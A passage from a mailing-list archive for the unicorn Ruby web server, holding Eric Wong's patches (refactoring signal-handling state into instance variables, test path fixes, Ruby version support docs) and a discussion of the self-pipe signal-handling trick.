In contrast, unicorn enqueues the signal before attempting to write to
the pipe, so we don't care at all if the write fails.  It doesn't matter
if the non-blocking write fails due to the pipe being full at all; as
any existing data in the pipe is sufficient to cause the reader to wake
up.

The correct order would be:

     SIGNAL_QUEUE << signal
     self_writer.write_nonblock('.') # we don't care if this fails

Furthermore, this avoids a race condition in multi-threaded situations.
Order is critical, even outside of signal handlers, this ordering of
events is fundamental to correct usage of things like condition
variables and waitqueues.


Btw, MRI 1.9.3+ also uses the self-pipe trick internally, too (see
thread_pthread.c) for signals and thread switching.  Current versions
use two pipes, one for high-priority wakeups, and one for low-priority
wakeups.

And on a related note, using pselect/ppoll/epoll_pwait/signalfd-style
syscalls which affect the signal mask is not feasible with runtimes
which already implement a high-level signal handling API.  I ripped out
signalfd support from sleepy_penguin a few years back because it would
always conflict with the signal handling API in Ruby itself...

And eventfd is cheaper and usable in place of a self-pipe from Ruby, of
course(*), but I haven't convinced ruby-core it's worth the maintenance
effort for thread_pthread.c; so a conservative project like unicorn
won't use it, yet.

Anyways, thanks for bringing this to our attention.


(*) I use it in yet another horribly-named server :)

^ permalink raw reply	[relevance 0%]

* Bug, Unicorn can drop signals in extreme conditions
@ 2015-02-16  2:19  4% Steven Stewart-Gallus
  2015-02-18  9:15  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Steven Stewart-Gallus @ 2015-02-16  2:19 UTC (permalink / raw)
  To: unicorn-public

Hello,

While reading the article at
http://www.sitepoint.com/the-self-pipe-trick-explained/ I realized
that the signal handling code shown there and of the same type in your
application is broken.  As you have a single nonblocking pipe in your
application you can drop signals entirely (and not just fold multiple
signals of the same type into one).  The simplest fix is to use a pipe
for each individual type of signal or to just use pselect or similar.
I'm pretty sure that there is a way to use a single pipe but it seems
complicated and very difficult to implement correctly.

Thank you,
Steven Stewart-Gallus

^ permalink raw reply	[relevance 4%]

* [PATCH] http_server: favor ivars over constants
@ 2015-02-12 19:09  8% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-12 19:09 UTC (permalink / raw)
  To: unicorn-public

In 1.9+ at least, instance variables use less space than constants
in class tables and bytecode, leading to ~700 byte reduction in
bytecode overhead on 64-bit and a reduction in constant table/entries
of the Unicorn::HttpServer class.
---
 lib/unicorn/http_server.rb | 77 +++++++++++++++++++++-------------------------
 1 file changed, 35 insertions(+), 42 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f0216d0..278b469 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -21,32 +21,12 @@ class Unicorn::HttpServer
   include Unicorn::SocketHelper
   include Unicorn::HttpResponse
 
-  # backwards compatibility with 1.x
-  Worker = Unicorn::Worker
-
   # all bound listener sockets
   LISTENERS = []
 
   # listeners we have yet to bind
   NEW_LISTENERS = []
 
-  # This hash maps PIDs to Workers
-  WORKERS = {}
-
-  # We use SELF_PIPE differently in the master and worker processes:
-  #
-  # * The master process never closes or reinitializes this once
-  # initialized.  Signal handlers in the master process will write to
-  # it to wake up the master from IO.select in exactly the same manner
-  # djb describes in http://cr.yp.to/docs/selfpipe.html
-  #
-  # * The workers immediately close the pipe they inherit.  See the
-  # Unicorn::Worker class for the pipe workers use.
-  SELF_PIPE = []
-
-  # signal queue used for self-piping
-  SIG_QUEUE = []
-
   # list of signals we care about and trap in master.
   QUEUE_SIGS = [ :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU ]
 
@@ -98,6 +78,19 @@ class Unicorn::HttpServer
     self.config = Unicorn::Configurator.new(options)
     self.listener_opts = {}
 
+    # We use @self_pipe differently in the master and worker processes:
+    #
+    # * The master process never closes or reinitializes this once
+    # initialized.  Signal handlers in the master process will write to
+    # it to wake up the master from IO.select in exactly the same manner
+    # djb describes in http://cr.yp.to/docs/selfpipe.html
+    #
+    # * The workers immediately close the pipe they inherit.  See the
+    # Unicorn::Worker class for the pipe workers use.
+    @self_pipe = []
+    @workers = {} # hash maps PIDs to Workers
+    @sig_queue = [] # signal queue used for self-piping
+
     # we try inheriting listeners first, so we bind them later.
     # we don't write the pid file until we've bound listeners in case
     # unicorn was started twice by mistake.  Even though our #pid= method
@@ -117,13 +110,13 @@ class Unicorn::HttpServer
     inherit_listeners!
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
-    SELF_PIPE.replace(Unicorn.pipe)
+    @self_pipe.replace(Unicorn.pipe)
     @master_pid = $$
 
     # setup signal handlers before writing pid file in case people get
     # trigger happy and send signals as soon as the pid file exists.
     # Note that signals don't actually get handled until the #join method
-    QUEUE_SIGS.each { |sig| trap(sig) { SIG_QUEUE << sig; awaken_master } }
+    QUEUE_SIGS.each { |sig| trap(sig) { @sig_queue << sig; awaken_master } }
     trap(:CHLD) { awaken_master }
 
     # write pid early for Mongrel compatibility if we're not inheriting sockets
@@ -276,7 +269,7 @@ class Unicorn::HttpServer
     end
     begin
       reap_all_workers
-      case SIG_QUEUE.shift
+      case @sig_queue.shift
       when nil
         # avoid murdering workers after our master process (or the
         # machine) comes out of suspend/hibernation
@@ -335,7 +328,7 @@ class Unicorn::HttpServer
   def stop(graceful = true)
     self.listeners = []
     limit = time_now + timeout
-    until WORKERS.empty? || time_now > limit
+    until @workers.empty? || time_now > limit
       if graceful
         soft_kill_each_worker(:QUIT)
       else
@@ -376,13 +369,13 @@ class Unicorn::HttpServer
 
   # wait for a signal hander to wake us up and then consume the pipe
   def master_sleep(sec)
-    IO.select([ SELF_PIPE[0] ], nil, nil, sec) or return
-    SELF_PIPE[0].kgio_tryread(11)
+    IO.select([ @self_pipe[0] ], nil, nil, sec) or return
+    @self_pipe[0].kgio_tryread(11)
   end
 
   def awaken_master
     return if $$ != @master_pid
-    SELF_PIPE[1].kgio_trywrite('.') # wakeup master process from select
+    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
   end
 
   # reaps all unreaped workers
@@ -396,7 +389,7 @@ class Unicorn::HttpServer
         self.pid = pid.chomp('.oldbin') if pid
         proc_name 'master'
       else
-        worker = WORKERS.delete(wpid) and worker.close rescue nil
+        worker = @workers.delete(wpid) and worker.close rescue nil
         m = "reaped #{status.inspect} worker=#{worker.nr rescue 'unknown'}"
         status.success? ? logger.info(m) : logger.error(m)
       end
@@ -465,7 +458,7 @@ class Unicorn::HttpServer
   def murder_lazy_workers
     next_sleep = @timeout - 1
     now = time_now.to_i
-    WORKERS.dup.each_pair do |wpid, worker|
+    @workers.dup.each_pair do |wpid, worker|
       tick = worker.tick
       0 == tick and next # skip workers that haven't processed any clients
       diff = now - tick
@@ -483,7 +476,7 @@ class Unicorn::HttpServer
   end
 
   def after_fork_internal
-    SELF_PIPE.each(&:close).clear # this is master-only, now
+    @self_pipe.each(&:close).clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
     @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
@@ -498,11 +491,11 @@ class Unicorn::HttpServer
   def spawn_missing_workers
     worker_nr = -1
     until (worker_nr += 1) == @worker_processes
-      WORKERS.value?(worker_nr) and next
-      worker = Worker.new(worker_nr)
+      @workers.value?(worker_nr) and next
+      worker = Unicorn::Worker.new(worker_nr)
       before_fork.call(self, worker)
       if pid = fork
-        WORKERS[pid] = worker
+        @workers[pid] = worker
         worker.atfork_parent
       else
         after_fork_internal
@@ -516,9 +509,9 @@ class Unicorn::HttpServer
   end
 
   def maintain_worker_count
-    (off = WORKERS.size - worker_processes) == 0 and return
+    (off = @workers.size - worker_processes) == 0 and return
     off < 0 and return spawn_missing_workers
-    WORKERS.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
+    @workers.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
   end
 
   # if we get any error, try to write something back to the client
@@ -597,13 +590,13 @@ class Unicorn::HttpServer
     worker.atfork_child
     # we'll re-trap :QUIT later for graceful shutdown iff we accept clients
     EXIT_SIGS.each { |sig| trap(sig) { exit!(0) } }
-    exit!(0) if (SIG_QUEUE & EXIT_SIGS)[0]
+    exit!(0) if (@sig_queue & EXIT_SIGS)[0]
     WORKER_QUEUE_SIGS.each { |sig| trap(sig, nil) }
     trap(:CHLD, 'DEFAULT')
-    SIG_QUEUE.clear
+    @sig_queue.clear
     proc_name "worker[#{worker.nr}]"
     START_CTX.clear
-    WORKERS.clear
+    @workers.clear
 
     after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.close_on_exec = true }
@@ -683,17 +676,17 @@ class Unicorn::HttpServer
   # is no longer running.
   def kill_worker(signal, wpid)
     Process.kill(signal, wpid)
-    rescue Errno::ESRCH
-      worker = WORKERS.delete(wpid) and worker.close rescue nil
+  rescue Errno::ESRCH
+    worker = @workers.delete(wpid) and worker.close rescue nil
   end
 
   # delivers a signal to each worker
   def kill_each_worker(signal)
-    WORKERS.keys.each { |wpid| kill_worker(signal, wpid) }
+    @workers.keys.each { |wpid| kill_worker(signal, wpid) }
   end
 
   def soft_kill_each_worker(signal)
-    WORKERS.each_value { |worker| worker.soft_kill(signal) }
+    @workers.each_value { |worker| worker.soft_kill(signal) }
   end
 
   # unlinks a PID file at given +path+ if it contains the current PID
-- 
EW


^ permalink raw reply related	[relevance 8%]

* Re: [PATCH] ISSUES: add section for bugs in other projects
  2015-02-10 17:06  6% [PATCH] ISSUES: add section for bugs in other projects Eric Wong
@ 2015-02-10 17:26 14% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-10 17:26 UTC (permalink / raw)
  To: unicorn-public

Squashing the following, since we don't want things sinkholed
or missed:

--- a/ISSUES
+++ b/ISSUES
@@ -6,7 +6,7 @@ submit patches and/or obtain support after you have searched the
 {documentation}[http://unicorn.bogomips.org/].
 
 * No subscription will ever be required to email the public inbox.
-* Please Cc: all participants in a thread, as subscription is optional
+* Cc: all participants in a thread or commit, as subscription is optional
 * Do not {top post}[http://catb.org/jargon/html/T/top-post.html] in replies
 * Quote as little as possible of the message you're replying to
 * Do not send HTML mail, it will likely be flagged as spam
@@ -39,9 +39,13 @@ but their mailing list remains operational.
 
 Uncommon bugs we encounter in the Linux kernel should be Cc:-ed to the
 Linux kernel mailing list (LKML) at mailto:linux-kernel@vger.kernel.org
-and other kernel lists such as mailto:netdev@vger.kernel.org
-(for networking issues).  No subscription is necessary, and the our
-mailing list follows the same conventions as LKML for interopability.
+and subsystem maintainers such as mailto:netdev@vger.kernel.org
+(for networking issues).  It is expected practice to Cc: anybody
+involved with any problematic commits (including those in the
+Signed-off-by: and other trailer lines).  No subscription is necessary,
+and the our mailing list follows the same conventions as LKML for
+interopability.  There is a kernel.org Bugzilla instance, but it is
+ignored by most developers.
 
 Likewise for any rare glibc bugs we might encounter, we should Cc:
 mailto:libc-alpha@sourceware.org

^ permalink raw reply	[relevance 14%]

* [PATCH] ISSUES: add section for bugs in other projects
@ 2015-02-10 17:06  6% Eric Wong
  2015-02-10 17:26 14% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-02-10 17:06 UTC (permalink / raw)
  To: unicorn-public

This is not anything new, just documenting what has been going
on since the beginning.

There's been a small number of generic networking (or mm) bugs in
the kernel which affect unicorn, but are usually found and fixed
with more popular, non-Ruby servers, first.

Aside from generic performance problems, I don't think there's ever
been a glibc bug which affected unicorn.
---
 ISSUES | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/ISSUES b/ISSUES
index f66d14a..343cab4 100644
--- a/ISSUES
+++ b/ISSUES
@@ -18,6 +18,36 @@ instead and your issue will be handled discreetly.
 If you don't get a response within a few days, we may have forgotten
 about it so feel free to ask again.
 
+== Bugs in related projects
+
+unicorn is sometimes affected by bugs in its dependencies.  Bugs
+triggered by unicorn in mainline Ruby, rack, GNU C library (glibc),
+or the Linux kernel will be reported upstream and fixed.
+
+For bugs in Ruby itself, we may forward bugs to
+https://bugs.ruby-lang.org/ and discuss+fix them on the ruby-core
+list at mailto:ruby-core@ruby-lang.org
+Subscription to post is required to ruby-core, unfortunately:
+mailto:ruby-core-request@ruby-lang.org?subject=subscribe
+
+For uncommon bugs in Rack, we may forward bugs to
+mailto:rack-devel@googlegroups.com and discuss there.
+Subscription (without any web UI or Google account) is possible via:
+mailto:rack-devel+subscribe@googlegroups.com
+Note: not everyone can use the proprietary bug tracker used by Rack,
+but their mailing list remains operational.
+
+Uncommon bugs we encounter in the Linux kernel should be Cc:-ed to the
+Linux kernel mailing list (LKML) at mailto:linux-kernel@vger.kernel.org
+and other kernel lists such as mailto:netdev@vger.kernel.org
+(for networking issues).  No subscription is necessary, and the our
+mailing list follows the same conventions as LKML for interopability.
+
+Likewise for any rare glibc bugs we might encounter, we should Cc:
+mailto:libc-alpha@sourceware.org
+Keep in mind glibc upstream does use Bugzilla for tracking bugs:
+https://sourceware.org/bugzilla/
+
 == Submitting Patches
 
 See the HACKING document (and additionally, the
-- 
EW

^ permalink raw reply related	[relevance 6%]

* [PATCH 2/2] reduce and localize constant string use
  @ 2015-02-09  9:12  6% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-09  9:12 UTC (permalink / raw)
  To: unicorn-public

Literal String#freeze avoids allocations since Ruby 2.1 via the
opt_str_freeze instruction, so we can start relying on it in
some places as Ruby 2.1 adoption increases.  The 100-continue
handling is a good place to start since it is an uncommonly-used
code path which benefits from size reduction and the negative
performance impact is restricted to a handful of users.

HTTP_RESPONSE_START can safely live in http_request.rb as its
usage does not cross namespace boundaries

The goal is to eventually eliminate Unicorn::Const entirely.
---
 lib/unicorn/const.rb        | 17 +----------------
 lib/unicorn/http_request.rb |  5 ++++-
 lib/unicorn/http_server.rb  | 18 ++++++++++--------
 3 files changed, 15 insertions(+), 25 deletions(-)

diff --git a/lib/unicorn/const.rb b/lib/unicorn/const.rb
index e24b511..33ab4ac 100644
--- a/lib/unicorn/const.rb
+++ b/lib/unicorn/const.rb
@@ -1,12 +1,6 @@
 # -*- encoding: binary -*-
 
-# :enddoc:
-# Frequently used constants when constructing requests or responses.
-# Many times the constant just refers to a string with the same
-# contents.  Using these constants gave about a 3% to 10% performance
-# improvement over using the strings directly.  Symbols did not really
-# improve things much compared to constants.
-module Unicorn::Const
+module Unicorn::Const # :nodoc:
   # default TCP listen host address (0.0.0.0, all interfaces)
   DEFAULT_HOST = "0.0.0.0"
 
@@ -23,14 +17,5 @@ module Unicorn::Const
   # temporary file for reading (112 kilobytes).  This is the default
   # value of client_body_buffer_size.
   MAX_BODY = 1024 * 112
-
-  # :stopdoc:
-  EXPECT_100_RESPONSE = "HTTP/1.1 100 Continue\r\n\r\n"
-  EXPECT_100_RESPONSE_SUFFIXED = "100 Continue\r\n\r\nHTTP/1.1 "
-
-  HTTP_RESPONSE_START = ['HTTP', '/1.1 ']
-  HTTP_EXPECT = "HTTP_EXPECT"
-
-  # :startdoc:
 end
 require_relative 'version'
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 6b20431..9888430 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -26,8 +26,11 @@ class Unicorn::HttpParser
 
   # :stopdoc:
   # A frozen format for this is about 15% faster
+  # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
+  # 2.2+ optimizes hash assignments when used with literal string keys
   REMOTE_ADDR = 'REMOTE_ADDR'.freeze
   RACK_INPUT = 'rack.input'.freeze
+  HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false
 
@@ -86,7 +89,7 @@ class Unicorn::HttpParser
     # detect if the socket is valid by writing a partial response:
     if @@check_client_connection && headers?
       @response_start_sent = true
-      Unicorn::Const::HTTP_RESPONSE_START.each { |c| socket.write(c) }
+      HTTP_RESPONSE_START.each { |c| socket.write(c) }
     end
 
     e[RACK_INPUT] = 0 == content_length ?
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index c44a71e..f0216d0 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -546,12 +546,15 @@ class Unicorn::HttpServer
     rescue
   end
 
-  def expect_100_response
-    if @request.response_start_sent
-      Unicorn::Const::EXPECT_100_RESPONSE_SUFFIXED
-    else
-      Unicorn::Const::EXPECT_100_RESPONSE
-    end
+  def e100_response_write(client, env)
+    # We use String#freeze to avoid allocations under Ruby 2.1+
+    # Not many users hit this code path, so it's better to reduce the
+    # constant table sizes even for 1.9.3-2.0 users who'll hit extra
+    # allocations here.
+    client.write(@request.response_start_sent ?
+                 "100 Continue\r\n\r\nHTTP/1.1 ".freeze :
+                 "HTTP/1.1 100 Continue\r\n\r\n".freeze)
+    env.delete('HTTP_EXPECT'.freeze)
   end
 
   # once a client is accepted, it is processed in its entirety here
@@ -561,8 +564,7 @@ class Unicorn::HttpServer
     return if @request.hijacked?
 
     if 100 == status.to_i
-      client.write(expect_100_response)
-      env.delete(Unicorn::Const::HTTP_EXPECT)
+      e100_response_write(client, env)
       status, headers, body = @app.call(env)
       return if @request.hijacked?
     end
-- 
EW


^ permalink raw reply related	[relevance 6%]

* [PATCH] fix uninstalled testing and reduce require paths
@ 2015-02-06 22:17  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-06 22:17 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

This fixes a bug introduced in
commit fe83ead4eae6f011fa15f506cd80cb4256813a92
(GNUmakefile: fix clean gem build + reduce build cruft)
which broke clean Ruby installations without an existing
unicorn gem installed :x
---
 GNUmakefile                      | 10 +++++++---
 test/exec/test_exec.rb           |  2 +-
 test/unit/test_http_parser.rb    |  2 +-
 test/unit/test_http_parser_ng.rb |  2 +-
 test/unit/test_request.rb        |  2 +-
 test/unit/test_response.rb       |  2 +-
 test/unit/test_server.rb         |  2 +-
 test/unit/test_signals.rb        |  2 +-
 test/unit/test_socket_helper.rb  |  2 +-
 test/unit/test_upload.rb         |  2 +-
 test/unit/test_util.rb           |  2 +-
 11 files changed, 17 insertions(+), 13 deletions(-)

diff --git a/GNUmakefile b/GNUmakefile
index 8bd63ee..2995a6b 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -59,13 +59,17 @@ $(ext)/unicorn_http.$(DLEXT): $(ext)/Makefile
 	$(MAKE) -C $(@D)
 http: $(ext)/unicorn_http.$(DLEXT)
 
+# only used for tests
+http-install: $(ext)/unicorn_http.$(DLEXT)
+	install -m644 $< lib/
+
 test-install: $(test_prefix)/.stamp
 $(test_prefix)/.stamp: $(inst_deps)
 	mkdir -p $(test_prefix)/.ccache
 	tar cf - $(inst_deps) GIT-VERSION-GEN | \
 	  (cd $(test_prefix) && tar xf -)
 	$(MAKE) -C $(test_prefix) clean
-	$(MAKE) -C $(test_prefix) http shebang RUBY="$(RUBY)"
+	$(MAKE) -C $(test_prefix) http-install shebang RUBY="$(RUBY)"
 	> $@
 
 # this is only intended to be run within $(test_prefix)
@@ -119,14 +123,14 @@ run_test = $(quiet_pre) \
 %.n: arg = $(subst .n,,$(subst --, -n ,$@))
 %.n: t = $(subst .n,$(log_suffix),$@)
 %.n: export PATH := $(test_prefix)/bin:$(PATH)
-%.n: export RUBYLIB := $(test_prefix):$(test_prefix)/lib:$(MYLIBS)
+%.n: export RUBYLIB := $(test_prefix)/lib:$(MYLIBS)
 %.n: $(test_prefix)/.stamp
 	$(run_test)
 
 $(T): arg = $@
 $(T): t = $(subst .rb,$(log_suffix),$@)
 $(T): export PATH := $(test_prefix)/bin:$(PATH)
-$(T): export RUBYLIB := $(test_prefix):$(test_prefix)/lib:$(MYLIBS)
+$(T): export RUBYLIB := $(test_prefix)/lib:$(MYLIBS)
 $(T): $(test_prefix)/.stamp
 	$(run_test)
 
diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 10a1bae..6deb96b 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2009 Eric Wong
 FLOCK_PATH = File.expand_path(__FILE__)
-require 'test/test_helper'
+require './test/test_helper'
 
 do_test = true
 $unicorn_bin = ENV['UNICORN_TEST_BIN'] || "unicorn"
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 2251dcf..431ede5 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -7,7 +7,7 @@
 # Additional work donated by contributors.  See git history
 # for more information.
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index d5c8d2e..0c81072 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -1,6 +1,6 @@
 # -*- encoding: binary -*-
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'digest/md5'
 
 include Unicorn
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index fbda1a2..f0ccaf7 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -4,7 +4,7 @@
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index bdca9f5..d0f0c79 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -7,7 +7,7 @@
 # Additional work donated by contributors.  See git history
 # for more information.
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'time'
 
 include Unicorn
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 9c92bab..8b3afad 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -7,7 +7,7 @@
 # Additional work donated by contributors.  See git history
 # for more information.
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 443c736..4592819 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -6,7 +6,7 @@
 #
 # Ensure we stay sane in the face of signals being sent to us
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index 994b990..8b09198 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -1,6 +1,6 @@
 # -*- encoding: binary -*-
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'tempfile'
 
 class TestSocketHelper < Test::Unit::TestCase
diff --git a/test/unit/test_upload.rb b/test/unit/test_upload.rb
index bcce4bc..5de02e4 100644
--- a/test/unit/test_upload.rb
+++ b/test/unit/test_upload.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 
 # Copyright (c) 2009 Eric Wong
-require 'test/test_helper'
+require './test/test_helper'
 require 'digest/md5'
 
 include Unicorn
diff --git a/test/unit/test_util.rb b/test/unit/test_util.rb
index 904d51c..4d17a16 100644
--- a/test/unit/test_util.rb
+++ b/test/unit/test_util.rb
@@ -1,6 +1,6 @@
 # -*- encoding: binary -*-
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'tempfile'
 
 class TestUtil < Test::Unit::TestCase
-- 
EW


^ permalink raw reply related	[relevance 4%]

* [PATCH] doc: update support status for Ruby versions
@ 2015-02-06 20:15  3% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-06 20:15 UTC (permalink / raw)
  To: unicorn-public

unicorn 5 will not support Ruby 1.8 anymore.

Drop mentions of Rubinius, too, it's too difficult to support due to
the proprietary and registration-required nature of its bug tracker.
The smaller memory footprint and CoW-friendly memory allocator in
mainline Ruby is a better fit for unicorn, anyways.

Since Ruby 1.9+ bundles RubyGems and gem startup is faster nowadays,
we'll just depend on that instead of not loading RubyGems.

Drop the local.mk.sample file, too, since it's way out-of-date
and probably isn't useful (I have not used it in a while).
---
 HACKING                         | 23 +++-------------
 KNOWN_ISSUES                    | 20 +++++++-------
 README                          |  3 ++-
 Sandbox                         |  2 +-
 lib/unicorn/configurator.rb     |  2 --
 lib/unicorn/http_server.rb      |  4 +--
 local.mk.sample                 | 59 -----------------------------------------
 t/README                        |  2 +-
 test/unit/test_socket_helper.rb |  4 +--
 9 files changed, 22 insertions(+), 97 deletions(-)
 delete mode 100644 local.mk.sample

diff --git a/HACKING b/HACKING
index 9b4da1b..6c5f897 100644
--- a/HACKING
+++ b/HACKING
@@ -19,13 +19,6 @@ RubyGems.
 Users of GNU-based systems (such as GNU/Linux) usually have GNU make
 installed as "make" instead of "gmake".
 
-Since we don't load RubyGems by default, loading Rack properly requires
-setting up RUBYLIB to point to where Rack is located.  Not loading
-RubyGems drastically lowers the time to run the full test suite.  You
-may setup a "local.mk" file in the top-level working directory to setup
-your RUBYLIB and any other environment variables.  A "local.mk.sample"
-file is provided for reference.
-
 Running the entire test suite with 4 tests in parallel:
 
   gmake -j4 check
@@ -70,10 +63,9 @@ becomes unavailable.
 
 === Ruby/C Compatibility
 
-We target Ruby 1.8.6+, 1.9 and will target Rubinius as it becomes
-production-ready.  We need the Ruby implementation to support fork,
-exec, pipe, UNIX signals, access to integer file descriptors and
-ability to use unlinked files.
+We target mainline Ruby 1.9.3 and later.  We need the Ruby
+implementation to support fork, exec, pipe, UNIX signals, access to
+integer file descriptors and ability to use unlinked files.
 
 All of our C code is OS-independent and should run on compilers
 supported by the versions of Ruby we target.
@@ -123,13 +115,6 @@ You can build the Unicorn gem with the following command:
 
 It is easy to install the contents of your git working directory:
 
-Via RubyGems (RubyGems 1.3.5+ recommended for prerelease versions):
+Via RubyGems
 
   gmake install-gem
-
-Without RubyGems (via setup.rb):
-
-  gmake install
-
-It is not at all recommended to mix a RubyGems installation with an
-installation done without RubyGems, however.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index 38263e7..69e4f57 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -17,16 +17,6 @@ acceptable solution.  Those issues are documented here.
   have builtin workarounds for Kernel#rand and OpenSSL::Random users,
   but applications may use other PRNGs.
 
-* Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
-  after_fork hook to get correct random number generation.  We have a builtin
-  workaround for this starting with \Unicorn 3.6.1
-
-  See http://redmine.ruby-lang.org/issues/show/4338
-
-* On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
-  stdio that causes failure for file uploads larger than 112K.  Upgrade
-  your version of Ruby or continue using Unicorn 1.x/3.4.x.
-
 * For notes on sandboxing tools such as Bundler or Isolate,
   see the {Sandbox}[link:Sandbox.html] page.
 
@@ -44,6 +34,16 @@ acceptable solution.  Those issues are documented here.
 
 == Known Issues (Old)
 
+* Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
+  after_fork hook to get correct random number generation.  We have a builtin
+  workaround for this starting with \Unicorn 3.6.1
+
+  See http://redmine.ruby-lang.org/issues/show/4338
+
+* On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
+  stdio that causes failure for file uploads larger than 112K.  Upgrade
+  your version of Ruby or continue using Unicorn 1.x/3.4.x.
+
 * Under Ruby 1.9.1, methods like Array#shuffle and Array#sample will
   segfault if called after forking.  Upgrade to Ruby 1.9.2 or call
   "Kernel.rand" in your after_fork hook to reinitialize the random
diff --git a/README b/README
index 02d01e1..f084d0c 100644
--- a/README
+++ b/README
@@ -12,7 +12,8 @@ both the the request and response in between \Unicorn and slow clients.
   cut out everything that is better supported by the operating system,
   {nginx}[http://nginx.net/] or {Rack}[http://rack.github.io/].
 
-* Compatible with Ruby 1.8 and later.  Rubinius support is in-progress.
+* Compatible with Ruby 1.9.3 and later.
+  unicorn 4.8.x will remain supported for Ruby 1.8 users.
 
 * Process management: \Unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
diff --git a/Sandbox b/Sandbox
index 3c7f226..f662b27 100644
--- a/Sandbox
+++ b/Sandbox
@@ -86,7 +86,7 @@ For now workarounds include doing one of the following:
 
 3. Explicitly setting RUBYLIB or $LOAD_PATH to include any gem path
    where the unicorn gem is installed
-   (e.g. /usr/lib/ruby/gems/1.9.1/gems/unicorn-VERSION/lib)
+   (e.g. /usr/lib/ruby/gems/1.9.3/gems/unicorn-VERSION/lib)
 
 === RUBYOPT pollution from SIGUSR2 upgrades
 
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index d14e608..69b4644 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -306,8 +306,6 @@ class Unicorn::Configurator
   #   to receive IPv4 queries on dual-stack systems.  A separate IPv4-only
   #   listener is required if this is true.
   #
-  #   This option is only available for Ruby 1.9.2 and later.
-  #
   #   Enabling this option for the IPv6-only listener and having a
   #   separate IPv4 listener is recommended if you wish to support IPv6
   #   on the same TCP port.  Otherwise, the value of \env[\"REMOTE_ADDR\"]
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 95a8ffe..895f56d 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -67,7 +67,7 @@ class Unicorn::HttpServer
   # you can set the following in your Unicorn config file, HUP and then
   # continue with the traditional USR2 + QUIT upgrade steps:
   #
-  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/1.9.2/bin/unicorn"
+  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.2.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map { |arg| arg.dup },
     0 => $0.dup,
